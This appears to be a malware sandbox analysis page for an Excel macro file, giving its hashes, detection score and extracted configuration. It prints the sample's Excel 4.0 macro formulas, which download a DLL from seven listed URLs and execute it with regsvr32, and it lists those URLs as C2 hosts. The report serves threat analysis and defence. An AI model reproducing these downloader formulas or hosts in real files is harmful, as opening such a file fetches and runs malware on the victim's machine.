Overview

overview

10

Static

static

10

c4ffabc8ad...1.xlsm

windows7-x64

10

c4ffabc8ad...1.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    c4ffabc8ad4e34a6de92ac93cb9f85b0ad9c01200380b50398a898e19a45a551

  • Size

    20KB

  • Sample

    241120-ka77esvdkr

  • MD5

    7157c8e92353241c54893d893d98b7b8

  • SHA1

    3b96061a78149f7875c3d89f6713405880c1a1c6

  • SHA256

    c4ffabc8ad4e34a6de92ac93cb9f85b0ad9c01200380b50398a898e19a45a551

  • SHA512

    90411f3284d332554cdd25d841c1cae8d7732a3fda8a9dd6ddecfc6c8c5763f922816187f20873aa26d99b7905c03df39f81fce6af2b2b5511334d07423319c7

  • SSDEEP

    384:iVb1GNjxKo4CGzPd6ZIwISKb5CzgObff9kC+xbX7ZnR:KINco4FLhnCBn9kC+xbLv

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://avirtual.com.ar/portfolio_low/LJtA7G2nnfwBAYE/

http://ard-paya.ir/cgi-bin/ddiue5yX5k28KC33EKw/

http://ascendmedicalsupplies.co.ke/FUTH99YV/faflDNXWq0bPv/

http://aslar.dk/lj/AFAQXrxdyafuA3kn/

https://assf.com.ng/2021/coY6141cNQXQYGrob4o/

http://barth1.dk/_vti_cnf/AEyc6G/

https://www.baligrod.pl/wp-admin/QDSXoxha21C55/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://avirtual.com.ar/portfolio_low/LJtA7G2nnfwBAYE/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ard-paya.ir/cgi-bin/ddiue5yX5k28KC33EKw/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ascendmedicalsupplies.co.ke/FUTH99YV/faflDNXWq0bPv/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aslar.dk/lj/AFAQXrxdyafuA3kn/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://assf.com.ng/2021/coY6141cNQXQYGrob4o/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://barth1.dk/_vti_cnf/AEyc6G/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.baligrod.pl/wp-admin/QDSXoxha21C55/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://avirtual.com.ar/portfolio_low/LJtA7G2nnfwBAYE/
xlm40.dropper

http://ard-paya.ir/cgi-bin/ddiue5yX5k28KC33EKw/
xlm40.dropper

http://ascendmedicalsupplies.co.ke/FUTH99YV/faflDNXWq0bPv/

Targets

    • Target

      c4ffabc8ad4e34a6de92ac93cb9f85b0ad9c01200380b50398a898e19a45a551

    • Size

      20KB

    • MD5

      7157c8e92353241c54893d893d98b7b8

    • SHA1

      3b96061a78149f7875c3d89f6713405880c1a1c6

    • SHA256

      c4ffabc8ad4e34a6de92ac93cb9f85b0ad9c01200380b50398a898e19a45a551

    • SHA512

      90411f3284d332554cdd25d841c1cae8d7732a3fda8a9dd6ddecfc6c8c5763f922816187f20873aa26d99b7905c03df39f81fce6af2b2b5511334d07423319c7

    • SSDEEP

      384:iVb1GNjxKo4CGzPd6ZIwISKb5CzgObff9kC+xbX7ZnR:KINco4FLhnCBn9kC+xbLv

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks